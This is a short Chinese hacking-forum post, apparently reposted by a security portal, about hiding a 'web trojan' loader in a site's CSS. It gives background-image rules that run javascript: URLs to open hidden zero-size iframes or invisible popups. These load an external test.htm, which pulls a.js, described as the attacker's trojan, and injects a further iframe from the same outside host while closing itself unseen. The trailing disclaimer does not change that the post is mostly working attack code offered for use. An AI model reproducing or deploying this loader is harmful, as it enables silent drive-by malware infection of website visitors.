Loading
0

真正能用,还有点效果的CSS挂马代码的方法

网上流行的: 
body 
{  
background-image: url('javascript:document.write("<Iframe src=http://www.myhack58.com/test.htm width=0 height=0></iframe>")') 

//此方法会使主页不正常.返回一片空白. 
用弹窗. 
body 
{  
background-image: url('javascript:open("http://www.myhack58.com/test.htm")') 

//弹出一个框.难看 易被发现. 
改进一下:

body 
{  
background-image: url(javascript:open('http://www.myhack58.com/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no')) 

test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示: 
<script src="a.js"></script> 
<script> 
window.opener=null;setTimeout("window.close();",5000); 
</script>  
a.js内容: 
document.write('<Iframe src="http://www.myhack58.com/calc.htm"></iframe>');  
请指教.

【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。